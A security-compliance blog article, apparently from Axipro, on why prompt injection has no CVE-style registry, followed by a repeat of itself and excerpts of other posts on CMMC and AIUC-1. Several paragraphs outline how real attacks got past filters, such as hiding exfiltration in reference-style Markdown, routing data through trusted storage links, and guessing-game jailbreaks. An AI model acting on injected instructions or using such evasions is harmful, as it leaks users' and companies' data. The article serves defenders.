Table of Contents

Reach SOC 2 Compliance in 6 Weeks or Less.

  / Prompt Injection: AI’s Biggest Security Risk

Prompt Injection: AI’s Biggest Security Risk

When researchers found that Microsoft 365 Copilot could be tricked into leaking corporate data from a single email, the flaw got a clean public identifier: CVE-2025-32711, severity 9.3. When a bug hunter coaxed ChatGPT into producing valid Windows product keys by framing the request as a guessing game, it got nothing. 

Both were prompt injections. Only one is trackable. That Vulnerability Tracking Gap in AI Security, and what it costs defenders, is the subject of this article.

What Is a CVE and Why Does It Matter for Software Security?

A CVE (Common Vulnerabilities and Exposures) is a unique public identifier for a specific software flaw. It gives the whole industry one name for one bug, so a researcher in Berlin and an analyst in Bahrain know they mean the same thing.

The Role of MITRE’s CVE Program in Traditional Vulnerability Management

The CVE program is run by the MITRE Corporation, a US nonprofit. Since 1999 it has assigned hundreds of thousands of IDs, each tied to a discrete, reproducible defect in a defined product and version.

A CVE is the connective tissue of coordinated disclosure: a researcher reports the flaw, the vendor patches it, the ID is published, and defenders map it to their own assets. Without that shared label, the same bug ends up with three names and no clear owner.

The National Vulnerability Database (NVD) and CVSS Scoring

The National Vulnerability Database, maintained by NIST, enriches each CVE with a CVSS (Common Vulnerability Scoring System) score from 0 to 10. That lets teams triage: a 9.3 jumps the queue, a 4.0 waits.

Why Prompt Injection Breaks the Traditional CVE Model

The CVE model assumes a bug lives in code, sits in a version, and can be fixed. Prompt injection violates all three.

Prompt Injection as a Class of Attack, Not a Discrete Bug

Prompt injection smuggles instructions into the data an LLM reads, so the model follows the attacker rather than the user. OWASP ranks it as LLM01, the top entry in its 2025 Top 10 for LLM Applications. It is a property of how language models work, not one line of faulty code, so you cannot file a CVE against it.

A SQL injection either works or it does not. A prompt injection might succeed nine times in ten, fail on the eleventh, then stop working after a silent model update, which makes the “reproducible” part of reporting genuinely hard.

Model Versioning vs. Software Versioning

Software has clean version numbers. A weight update to a hosted model can ship silently, with no version a researcher can cite. Two calls to “gpt-4o” a week apart may not behave the same way, and there is no changelog to point at.

Why “Patching” an LLM Differs From Patching Code

Patching code closes a specific hole. A developer rewrites the faulty line, ships the diff, and the exploit path is gone for good. That clean, binary, auditable loop is the entire premise on which the CVE system rests. “Patching” a model offers none of it. There is no single line to fix, because the behavior the attacker abused is the same behavior that makes the model useful: it reads text and follows instructions. A vendor’s only levers, retraining, hardening the system prompt, or wrapping the model in input and output guardrails, all lower the odds of a successful attack rather than removing the possibility.

The fix reduces the success rate from 80 percent to 5 percent and marks it as remediated. The hole is narrower, not closed.

The recent record shows how thin that margin is. EchoLeak got past Microsoft’s dedicated cross-prompt-injection classifier by hiding its exfiltration channel in reference-style Markdown that the filter did not recognize, and the AgentFlayer exploit slipped through OpenAI’s URL safety check by routing stolen data through trusted Azure Blob Storage links. Each guardrail worked against the obvious version of the attack and fell to a rephrasing. There is a tuning tax on top of that: crank the filters too tight and the model starts refusing legitimate work, so vendors settle for a balance point rather than elimination. 

The practical takeaway is to treat “we’ve addressed this” as risk reduction, not closure.

SOC 2, ISO 27001 and HIPAA done for you. Fixed fee, 100% audit pass rate.

Audit-ready in 6 weeks. Not 6 months.

The Current State of AI Vulnerability Tracking

Several frameworks exist. None is a true registry of individual, citable prompt injection vulnerabilities.

OWASP LLM Top 10 and the LLM01 Classification

The OWASP GenAI Security Project’s LLM01:2025 entry is the most cited reference point. It is a category, not a catalog: it does not enumerate specific incidents with IDs.

MITRE ATLAS for Adversarial AI Threats

MITRE ATLAS is an ATT&CK-style knowledge base of adversarial tactics against AI systems, documenting 16 tactics and more than 80 techniques with real-world case studies as of late 2025. It maps how attacks work, but is not a per-vulnerability ledger with scores.

AVID (AI Vulnerability Database) and Its Limitations

AVID, run by a nonprofit, is the closest thing to a dedicated AI vulnerability database, cataloging failure modes with reproducible evidence. But it leans on community submissions, skews toward bias and broader failure modes, and notes that the definition of an “AI vulnerability” is itself still a working one.

Vendor-Specific Disclosures vs. Industry-Wide Registries

Disclosure happens vendor by vendor. OpenAI patched the Windows-key jailbreak server-side; Microsoft fixed EchoLeak and issued a CVE. There is no common venue where these land side by side.

 

The Consequences of No Shared Threat Registry for Prompt Injection

Fragmented Disclosure Across AI Vendors

Each lab discloses on its own terms, on its own blog, if at all. A defender protecting a multi-model stack has to monitor a dozen channels and hope nothing slips by.

Duplicate Discovery and Wasted Research Effort

Researchers rediscover the same attack repeatedly. The guessing-game jailbreak, the “dead grandma” trick, and other framing attacks are variations on one theme nobody numbered.

No Standardized Severity Scoring for LLM Attacks

CVSS was built for deterministic flaws. There is no agreed way to score an attack that is probabilistic and context-dependent, so “how bad is this” has no common answer.

Slower Defender Response Times

Without a feed to subscribe to, teams learn about LLM attacks from news and conference talks rather than a structured alert.

Challenges for Enterprise Risk Assessment and Procurement

Buyers cannot ask a vendor, “which known prompt injection issues affect your product, and are they fixed?” the way they can with CVEs. That makes enterprise risk assessment and procurement an exercise in trust rather than evidence.

Why a CVE-Like System for Prompt Injection Is Hard to Build

Reproducibility Challenges Across Model Updates

A CVE entry promises that anyone can reproduce the flaw. That guarantee is what lets a researcher verify it, a vendor confirm it, and a defender test whether their own systems are exposed. A hosted model breaks the promise on both ends. The same prompt can fail on the eleventh attempt because of normal sampling variance, and the weights themselves can change between Tuesday and Wednesday with no version bump to point to. A proof of concept that worked at disclosure may quietly stop working a week later, not because anyone fixed it, but because the model drifted. An identifier is only as useful as the thing it points to, and here the thing keeps moving.

Closed-Weight Models and Disclosure Asymmetry

With closed-weight models from OpenAI, Anthropic, Google, and others, only the lab sees the internals. Outsiders report behavior; the provider decides what to confirm and disclose. That puts the entity with the most information in sole control of how much reaches the public, and the incentives do not favor openness. Confirming a flaw invites scrutiny, while a silent server-side fix attracts none. A neutral registry depends on independent parties being able to validate and publish, and closed weights leave them able to observe symptoms but never inspect the cause.

The Blurred Line Between Bug, Feature, and Misuse

Is a model following an instruction inside a document a bug, or is the feature working as designed? A registry needs a clear yes or no on “is this a vulnerability,” and prompt injection rarely offers one. The model is doing exactly what it was built to do: read text and act on it. Whether that counts as a defect depends entirely on context the model cannot see, namely, whose instruction it was and whether the user wanted it followed. That ambiguity also gives vendors an easy out, since “working as intended” is a defensible label for behavior nobody can cleanly call broken. A catalog cannot index something the industry will not agree to name.

Shared Responsibility Between Model Providers and Application Developers

A prompt injection usually turns dangerous only when an application wires the model to tools, data, and actions through RAG, connectors, or agents. Responsibility is split between the provider and the developer, and neither side owns the whole failure. The model provider can argue the model behaved normally, and the integration was unsafe; the developer can argue they were relying on the model to resist manipulation. Both have a point, which is precisely the problem. With no clear owner, there is no clear party to file the disclosure, assign the severity, or ship the fix, and the issue falls into the gap between them.

SOC 2, ISO 27001 and HIPAA done for you. Fixed fee, 100% audit pass rate.

Audit-ready in 6 weeks. Not 6 months.

Proposed Frameworks for an AI Threat Registry

Extending CVE to Cover Model-Level Vulnerabilities

One option is to stretch the existing CVE schema to cover model behaviors, accepting probabilistic, version-fuzzy entries. It reuses trusted infrastructure but strains reproducibility norms.

Creating a Dedicated Prompt Injection Disclosure Standard

Another is a purpose-built standard with its own identifiers, severity model, and reproducibility rules, designed for non-determinism from the start.

Lessons From CVE Numbering Authorities (CNAs) Applied to AI Labs

The CVE program already delegates ID assignment to CNAs (CVE Numbering Authorities), often the vendors themselves. AI labs could become CNAs for their own models, issuing identifiers under shared rules, as Microsoft does for Copilot.

Coordinated Vulnerability Disclosure (CVD) for LLMs

Underpinning all of it is Coordinated Vulnerability Disclosure: agreed timelines, safe harbor for researchers, and a standard report format adapted to AI’s quirks.

 

What Enterprises Can Do Until a Registry Exists

Building Internal Prompt Injection Threat Catalogs

Keep a catalog of every injection technique that affects your deployed AI, with prompts, conditions, and mitigations, so you are not rediscovering attacks each quarter.

Subscribing to AI-Specific Threat Intelligence Feeds

Follow AI security research as a dedicated intelligence stream, not incidental news. Outlets like Wired and academic preprints on arXiv tend to surface novel attacks well before any vendor advisory does.

Participating in AI Red Team Communities

Red teaming is the only reliable way to know how your specific stack fails. Testing against your own guardrails, RAG pipelines, and agents finds issues no external list would hold.

Tracking OWASP, MITRE ATLAS, and AVID Updates

Treat OWASP’s LLM Top 10, MITRE ATLAS, and AVID as your standing reference set and check them on a schedule.

Pro Tip: Map your internal catalog to ATLAS technique IDs and OWASP LLM categories as you build it. When a real standard arrives your records translate instead of needing a rebuild, and meanwhile auditors get a recognized vocabulary to assess against.

Pro Tip: Map your internal catalog

Map your internal catalog to ATLAS technique IDs and OWASP LLM categories as you build it. When a real standard arrives your records translate instead of needing a rebuild, and meanwhile auditors get a recognized vocabulary to assess against.

The Path Forward: Standardizing AI Vulnerability Disclosure

Industry Collaboration Between AI Labs, Researchers, and Regulators

No single lab can run a credible cross-vendor registry; rivals will not report into a competitor’s database. It needs a neutral steward, plausibly MITRE or a NIST-backed consortium, with labs participating as authorities.

Regulatory Pressure From the EU AI Act and NIST AI RMF

The EU AI Act imposes obligations on high-risk and general-purpose AI, including incident reporting, while the NIST AI Risk Management Framework and ISO/IEC 42001 push toward documented, auditable AI risk processes. Structured disclosure is the natural next requirement.

A Call for a Public AI Vulnerability Database

The destination is a public, neutral, AI-native vulnerability database: shared IDs, a severity model built for probabilistic attacks, and disclosure rules every major lab signs onto. We are not there yet, so everything above is a stopgap.

 

Conclusion

Prompt injection is the top-ranked risk in AI security and the least trackable. It earns a CVE only when it surfaces inside a discrete product; the model-level root cause and server-side fixes leave no public trace. Until the industry builds an AI-native registry with a severity model fit for non-deterministic attacks, defenders must stitch together OWASP categories, ATLAS techniques, AVID entries, and their own catalogs. Build that internal catalog now. It is the one piece you fully control.

Frequently Asked Questions

Is there a CVE for prompt injection?

Sometimes. When it manifests in a specific product, like EchoLeak in Microsoft 365 Copilot (CVE-2025-32711) or CurXecute in Cursor (CVE-2025-54135), it can receive a CVE. The general attack class against language models has none.

Because it is a class of behavior, not a discrete code defect. It is probabilistic, it can break across silent model updates, and it often has no single fix, all of which clash with the reproducibility a CVE assumes.

AVID is the nearest dedicated database, while OWASP’s LLM Top 10 and MITRE ATLAS are the dominant classification frameworks. None is a complete, citable registry of individual vulnerabilities.

Inconsistently. Some patch silently server-side, some publish blog write-ups, and some issue CVEs when the flaw sits in a versioned product.

No. ATLAS catalogs tactics and techniques, not individual scored vulnerabilities, so it complements a CVE-style registry rather than replacing one.

Possibly. AI labs could act as CVE Numbering Authorities, but the non-deterministic nature of prompt injection makes full coverage unlikely without a purpose-built standard.

Axipro Author

Picture of Pedro Dias

Pedro Dias

Pedro has been writing online for over 10 years. With experience in all things programming, cyber security, and compliance, he is our editor-in-chief at Axipro.

Blog Highlights

Explore More Articles

When researchers found that Microsoft 365 Copilot could be tricked into leaking corporate data from a single email, the flaw got a clean public identifier: CVE-2025-32711, severity 9.3. When a bug hunter coaxed ChatGPT into producing valid Windows product keys by framing the request as a guessing game, it got nothing.  Both were prompt injections. Only one is trackable. That Vulnerability Tracking Gap in AI Security, and what it costs defenders, is the subject of this article. What Is a CVE and Why Does It Matter for Software Security? A CVE (Common Vulnerabilities and Exposures) is a unique public identifier for a specific software flaw. It gives the whole industry one name for one bug, so a researcher in Berlin and an analyst in Bahrain know they mean the same thing. The Role of MITRE’s CVE Program in Traditional Vulnerability Management The CVE program is run by the MITRE Corporation, a US nonprofit. Since 1999 it has assigned hundreds of thousands of IDs, each tied to a discrete, reproducible defect in a defined product and version. A CVE is the connective tissue of coordinated disclosure: a researcher reports the flaw, the vendor patches it, the ID is published, and defenders map it to their own assets. Without that shared label, the same bug ends up with three names and no clear owner. The National Vulnerability Database (NVD) and CVSS Scoring The National Vulnerability Database, maintained by NIST, enriches each CVE with a CVSS (Common Vulnerability Scoring System) score from 0 to 10. That lets teams triage: a 9.3 jumps the queue, a 4.0 waits. Why Prompt Injection Breaks the Traditional CVE Model The CVE model assumes a bug lives in code, sits in a version, and can be fixed. Prompt injection violates all three. Prompt Injection as a Class of Attack, Not a Discrete Bug Prompt injection smuggles instructions into the data an LLM reads, so the model follows the attacker rather than the user. OWASP ranks it as LLM01, the top entry in its 2025 Top 10 for LLM Applications. It is a property of how language models work, not one line of faulty code, so you cannot file a CVE against it. A SQL injection either works or it does not. A prompt injection might succeed nine times in ten, fail on the eleventh, then stop working after a silent model update, which makes the “reproducible” part of reporting genuinely hard. Model Versioning vs. Software Versioning Software has clean version numbers. A weight update to a hosted model can ship silently, with no version a researcher can cite. Two calls to “gpt-4o” a week apart may not behave the same way, and there is no changelog to point at. Why “Patching” an LLM Differs From Patching Code Patching code closes a specific hole. A developer rewrites the faulty line, ships the diff, and the exploit path is gone for good. That clean, binary, auditable loop is the entire premise on which the CVE system rests. “Patching” a model offers none of it. There is no single line to fix, because the behavior the attacker abused is the same behavior that makes the model useful: it reads text and follows instructions. A vendor’s only levers, retraining, hardening the system prompt, or wrapping the model in input and output guardrails, all lower the odds of a successful attack rather than removing the possibility. The fix reduces the success rate from 80 percent to 5 percent and marks it as remediated. The hole is narrower, not closed. The recent record shows how thin that margin is. EchoLeak got past Microsoft’s dedicated cross-prompt-injection classifier by hiding its exfiltration channel in reference-style Markdown that the filter did not recognize, and the AgentFlayer exploit slipped through OpenAI’s URL safety check by routing stolen data through trusted Azure Blob Storage links. Each guardrail worked against the obvious version of the attack and fell to a rephrasing. There is a tuning tax on top of that: crank the filters too tight and the model starts refusing legitimate work, so vendors settle for a balance point rather than elimination.  The practical takeaway is to treat “we’ve addressed this” as risk reduction, not closure. SOC 2, ISO 27001 and HIPAA done for you. Fixed fee, 100% audit pass rate. Audit-ready in 6 weeks. Not 6 months. Schedule A Free ASSESSMENT The Current State of AI Vulnerability Tracking Several frameworks exist. None is a true registry of individual, citable prompt injection vulnerabilities. OWASP LLM Top 10 and the LLM01 Classification The OWASP GenAI Security Project’s LLM01:2025 entry is the most cited reference point. It is a category, not a catalog: it does not enumerate specific incidents with IDs. MITRE ATLAS for Adversarial AI Threats MITRE ATLAS is an ATT&CK-style knowledge base of adversarial tactics against AI systems, documenting 16 tactics and more than 80 techniques with real-world case studies as of late 2025. It maps how attacks work, but is not a per-vulnerability ledger with scores. AVID (AI Vulnerability Database) and Its Limitations AVID, run by a nonprofit, is the closest thing to a dedicated AI vulnerability database, cataloging failure modes with reproducible evidence. But it leans on community submissions, skews toward bias and broader failure modes, and notes that the definition of an “AI vulnerability” is itself still a working one. Vendor-Specific Disclosures vs. Industry-Wide Registries Disclosure happens vendor by vendor. OpenAI patched the Windows-key jailbreak server-side; Microsoft fixed EchoLeak and issued a CVE. There is no common venue where these land side by side.   The Consequences of No Shared Threat Registry for Prompt Injection Fragmented Disclosure Across AI Vendors Each lab discloses on its own terms, on its own blog, if at all. A defender protecting a multi-model stack has to monitor a dozen channels and hope nothing slips by. Duplicate Discovery and Wasted Research Effort Researchers rediscover the same attack repeatedly. The guessing-game jailbreak, the “dead grandma” trick, and other framing attacks are variations on one theme nobody numbered. No Standardized Severity Scoring for

On November 10, 2026, third-party certification becomes mandatory for most small defense contractors that handle Controlled Unclassified Information. That date, the start of Phase 2 of the CMMC rollout, is the one to circle in red.  The framework itself has been binding since the 32 CFR program rule took effect on December 16, 2024, and certification clauses began appearing in new contracts on November 10, 2025. Roughly 73 percent of the Defense Industrial Base (DIB) is made up of small businesses, and a 20-person machine shop now faces the same control set as a prime with a dedicated security team. This guide breaks down what the CMMC requirements for small business actually demand: the levels, the controls, the documentation, the real cost, and the route to certification. What Is CMMC and Who Needs to Comply? The Cybersecurity Maturity Model Certification is the Department of Defense’s program for verifying that contractors protect sensitive federal information on their own systems. For years, contractors simply self-attested compliance with NIST Special Publication 800-171. CMMC ends the honor system. It keeps self-assessment for lower-risk work and adds independent audits for everything else. Two regulations run the program. 32 CFR Part 170 defines the structure, the three levels, and the assessment rules. 48 CFR amends the Defense Federal Acquisition Regulation Supplement and embeds CMMC into contracts through clause DFARS 252.204-7021. The first sets the standard, the second makes it a condition of the award. Compliance is not optional based on company size. If you process, store, or transmit Federal Contract Information (FCI) or Controlled Unclassified Information (CUI) in the performance of a DoD contract or subcontract, CMMC applies. The requirement flows down from prime contractors to subcontractors and suppliers at every tier. The main carve-out is for companies that supply only commercially available off-the-shelf (COTS) products. The distinction between the two data types drives everything. FCI is information not meant for public release that is provided by or generated for the government under a contract. CUI is more sensitive: technical drawings, specifications, and procurement data the government requires you to safeguard. Which one you handle sets your level. The fastest way to check is your contract itself. Clauses such as DFARS 252.204-7012, 7019, and 7020 are strong signals that CUI is in scope. CMMC Levels Explained for Small Businesses CMMC has three levels. Most small contractors land at Level 1 or Level 2. Level 3 is reserved for a tiny fraction of the supply chain handling the most sensitive programs. Level 1 covers basic safeguarding of FCI. It maps to the 15 requirements in FAR 52.204-21, things most businesses already do, like using passwords and limiting who can access systems. Self-assessment is permitted and the cost is modest. Level 2 is where the majority of CUI-handling contractors sit. It requires all 110 security requirements in NIST SP 800-171 Revision 2, organized across 14 control families. Some non-prioritized contracts allow an annual self-assessment, but DoD estimates that around 95 percent of Level 2 contractors handle CUI critical enough to require a C3PAO assessment. Level 3 adds 24 selected enhanced requirements from NIST SP 800-172 on top of the full 110, for high-value programs targeted by advanced persistent threats. Assessments are conducted by the government’s Defense Industrial Base Cybersecurity Assessment Center (DIBCAC), and a contractor must already hold Level 2 certification before a Level 3 assessment can begin. Fewer than 1 percent of contractors will need it. To determine your level, read the solicitation and ask your prime directly. If any data you touch is CUI, plan for Level 2 and assume a third-party assessment until a contract tells you otherwise. Prepare Your Business for CMMC Compliance Get ready for the November 2026 CMMC deadline with expert guidance. Talk to a CMMC Expert Core CMMC Requirements Small Businesses Must Meet Level 2 requirements break into 14 control families covering 110 individual requirements and 320 assessment objectives. Access Control and System and Communications Protection are the two heaviest domains. In practice, these families fall into two buckets. The technical controls govern how your systems behave: limiting access to authorized users, requiring multi-factor authentication, logging system activity, hardening configurations, encrypting data, and detecting and responding to incidents. The administrative controls govern how your organization behaves: training staff, screening personnel, controlling physical spaces, assessing risk, and documenting everything. A small business cannot skip a family because it is inconvenient. There is no partial credit and no small-business exemption from the 110. Documentation Requirements for Small Business Compliance Assessors evaluate evidence, not intentions. Two documents anchor the entire effort. The System Security Plan (SSP) describes your environment, your CUI boundary, and how you implement each of the 110 controls. It is a living document and the first thing any assessor reads. The Plan of Action and Milestones (POA&M) records gaps, owners, and timelines for fixing them. CMMC scores Level 2 on a 110-point scale weighted by control importance. A score of at least 88 (80 percent) can earn conditional status, but only if certain high-value controls are fully met. Conditional status gives you 180 days to close every remaining item on your POA&M and pass a closeout assessment. Some critical controls cannot be deferred to a POA&M at all. Beyond the SSP and POA&M, you need written policies and procedures for each domain, plus concrete evidence that controls operate as documented: configuration screenshots, training logs, access reviews, and audit records. Pro Tip: Build your SSP Build your SSP before you spend a dollar on tools. Mapping your current state against all 110 requirements first tells you exactly where the gaps are, so you remediate the right things in the right order instead of buying software you may not need. Technical Requirements and Controls A handful of technical controls account for most assessment failures, and they deserve direct attention. The most effective cost and risk lever is scoping: isolating CUI into a dedicated enclave, a defined set of systems and networks, so the 110 controls apply only there rather than across your

Most security certifications were built for software that follows rules. AI agents do not. They consume data, draw conclusions, call tools, and take action, increasingly without a human in the loop. That gap is what AIUC-1 was created to close: it is the first auditable security standard built specifically for AI agents, and a few enterprise buyers have started asking vendors for it by name. This guide covers what AIUC-1 actually tests, the six risk domains it audits, how the certification process works, what it costs, how long it lasts, and how it aligns with SOC 2, ISO 42001, ISO 27001, and the NIST AI Risk Management Framework. It also covers the structural questions worth asking before you treat an AIUC-1 report as proof of anything. What Is AIUC-1 Certification? AIUC-1 is a certifiable standard for AI agents created by the Artificial Intelligence Underwriting Company (AIUC), a San Francisco-based, venture-backed startup founded by people with experience at organizations including Anthropic. The standard was developed with input from Orrick, Stanford, the Cloud Security Alliance, MIT, and MITRE, and launched in mid-2025. The framework comprises 51 requirements and 130 controls, organized across six risk pillars. It evaluates whether an organization has implemented and tested the technical guardrails, operational practices, and legal policies needed to reduce the risk of unsafe, unreliable, or unauthorized AI behavior. Certification applies to a specific AI system or product, not to the organization as a whole. An AIUC-1 certificate, audit report, and badge tell enterprise buyers that an agent has been independently tested against agent-specific risks. People describe AIUC-1 as the “SOC 2 for AI agents,” and the analogy holds in spirit. The difference is what it looks at. SOC 2 examines a service organization’s general controls. AIUC-1 examines how an agent behaves under pressure: when someone tries to jailbreak it, when it is asked to do something outside its scope, when it has access to data it should not expose. Worth Knowing: About AIUC-1 AIUC-1 does not define what counts as an “AI agent.” The vendor decides which system to certify and what falls in scope. That makes scope the single most important thing to check on any certificate, because a narrowly scoped audit may not cover the agent you actually use. Why AIUC-1 Certification Matters for Enterprise AI Adoption The business case rests on a simple problem: enterprises cannot reliably assess the security of their AI vendors, and the failures are expensive. According to EY research on responsible AI, 64% of companies with over $1 billion in revenue have already lost more than $1 million to AI-related failures.  That gap shows up directly in sales cycles. When security, legal, and procurement teams evaluate an AI vendor, they ask about hallucinations, prompt injection defenses, and what happens when an agent makes an unauthorized call. SOC 2 and ISO 27001 do not answer those questions. AIUC-1 gives buyers a structured, third-party-tested answer, which is why holding the certificate can move a stalled procurement review forward. The certification also produces real engineering outcomes, not just a badge. AIUC has reported cases where a customer service agent’s hallucination rate dropped from 11% to under 2% after strengthening its groundedness filter, and another where inappropriate-tone outputs fell from 9% to under 2% through better defensive prompting and output moderation. One company found and patched a PII exposure vulnerability during the certification process itself. The Six Core Risk Domains Covered by AIUC-1 AIUC-1’s 51 requirements are grouped into six domains. Each targets a category of risk that traditional security frameworks were not designed to handle. Data and Privacy Covers how customer data is used, retained, and protected. Requirements address input and output data policies, limits on what data the agent can access, protection of IP and trade secrets, prevention of cross-customer data exposure, and prevention of PII leakage. This is where the standard forces clarity on whether customer data trains the model and how long it is kept. Security The adversarial-resistance domain. It covers third-party testing of adversarial robustness, detection and real-time filtering of malicious inputs, prevention of prompt injection and unauthorized agent actions, enforcement of user access privileges, and protection of the deployment environment. This is the heart of what separates an agent audit from a general security audit. Safety Focuses on preventing harmful and out-of-scope outputs. Requirements include defining an AI risk taxonomy, conducting pre-deployment testing, preventing harmful and customer-defined high-risk outputs, and flagging high-risk outputs for human review. Safety is partly judgment-based, which means documentation alone can sometimes satisfy a requirement, so the testing behind it deserves scrutiny. Reliability Targets the failure modes that erode trust in production: hallucinations and tool misuse. Controls cover hallucination prevention and restrictions on which tools an agent can call and when. For a customer-facing agent, this is the domain that keeps it from inventing a refund policy or triggering the wrong workflow. Accountability Covers what happens when things go wrong. Requirements include AI failure response plans, vendor due diligence, and clear AI disclosure so users know when they are interacting with an agent. With human workers, accountability is built into org charts and chains of command. Agents need an equivalent, and this domain supplies it. Society The broadest domain, focused on preventing misuse with wider consequences: AI-enabled cyber attacks and CBRN (chemical, biological, radiological, nuclear) misuse. Most enterprise agents will touch only a few of these controls, but they matter for higher-capability systems. Insider Note: Of the 130 total controls, roughly 65 are mandatory, and 65 are optional. A straightforward agent typically needs to meet around 40 controls. A complex, multi-modal agent gets closer to 65. The scoping exercise determines which apply, so two AIUC-1 certificates can represent very different amounts of work. Ready to Earn Your AIUC-1 Certification? Accelerate Your AI Certification Journey Talk to an Expert Who Needs AIUC-1 Certification? AIUC-1 is built for any company developing or deploying agentic AI that sells into enterprises. The strongest fit is an organization whose product uses AI agents in customer-facing operations, handles